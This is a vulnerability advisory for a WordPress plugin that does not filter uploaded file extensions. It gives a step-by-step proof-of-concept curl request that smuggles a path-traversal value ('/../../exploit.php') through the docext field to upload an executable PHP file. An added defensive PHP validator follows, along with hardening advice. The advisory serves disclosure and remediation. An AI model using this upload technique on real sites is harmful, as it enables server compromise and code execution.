The plugin does not filter file extensions when letting users upload files to the server, which may lead to malicious code being uploaded.
1) Create a file named exploit.php, which contains: <?php phpinfo();
2) Find the upf_ajax_nonce on the site's front page.
3) Run the following cURL request:
curl --url 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -b 'YOUR COOKIES' -F '[email protected]' -F 'docext=/../../exploit.php' -F 'doc_type=doc/pdf' -F 'action=upload_doc_callback' -F 'upf_nonce=YOUR NONCE'
# You can find the uploaded PHP file at: https://target/blog/wp-content/uploads/exploit.php
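A server-side check that rejects the request above, as an added example (not the plugin's code or its actual patch). The function name, the allowlist and the use of PHP's fileinfo extension are assumptions; `docext` is the request field shown on this page.

```php
<?php
// Added example: validate an upload whose extension arrives in an untrusted
// request field (docext on this page). All names here are hypothetical.

const ALLOWED_EXT = [
    'pdf' => 'application/pdf',
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
];

/**
 * Return a safe absolute destination path for an upload, or null to reject it.
 * $clientExt is the untrusted extension field; $tmpPath is the uploaded temp file.
 */
function safe_upload_target(string $uploadDir, string $clientExt, string $tmpPath): ?string
{
    // 1. The extension must be an exact allowlist key, so values containing
    //    dots, slashes or ".." never match.
    $ext = strtolower($clientExt);
    if (!array_key_exists($ext, ALLOWED_EXT)) {
        return null;
    }
    // 2. The content must match the claimed type. The type is sniffed from the
    //    file itself, not taken from the client-supplied doc_type/Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED_EXT[$ext]) {
        return null;
    }
    // 3. The server chooses the file name; nothing from the request reaches the path.
    $base = realpath($uploadDir);
    if ($base === false) {
        return null;
    }
    return $base . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs: the PHP file from step 1 and a minimal PDF.
$dir = sys_get_temp_dir();
$php = tempnam($dir, 'up'); file_put_contents($php, "<?php phpinfo();");
$pdf = tempnam($dir, 'up'); file_put_contents($pdf, "%PDF-1.4\n%%EOF\n");

var_dump(safe_upload_target($dir, '/../../exploit.php', $php)); // docext value from the request above
var_dump(safe_upload_target($dir, 'pdf', $php));                // allowed extension, PHP content
var_dump(safe_upload_target($dir, 'pdf', $pdf));                // allowed extension, PDF content
unlink($php); unlink($pdf);
```

Disabling PHP execution in the uploads directory at the web-server level limits the impact if a check like this is ever bypassed.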